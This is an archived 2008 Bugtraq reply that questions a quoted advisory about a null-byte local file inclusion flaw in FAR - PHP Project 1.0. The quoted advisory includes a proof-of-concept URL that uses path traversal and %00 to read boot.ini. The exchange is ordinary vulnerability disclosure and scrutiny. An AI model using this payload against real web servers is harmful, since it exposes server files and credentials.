|
|
 |
| New User, Welcome! Login |
Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0
| From: |
William McAfee <sec-community thegoodhacker com> |
| To: |
beenudel1986 gmail com |
| Cc: |
bugtraq securityfocus com |
| Subject: |
Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0 |
| Date: |
Thu - Aug 21, 2008 06:53 PM |
I'm sorry, but your screenshot actually leads me to not have much more
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure
script, please. Also, on an unrelated note, why are you running
professional? Why did you blank out the bottom half of the window?
What are you hiding?
On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@gmail.com wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk:Null Byte Files Retrieval
> #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
> |_____________________________________________________________________________________|
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
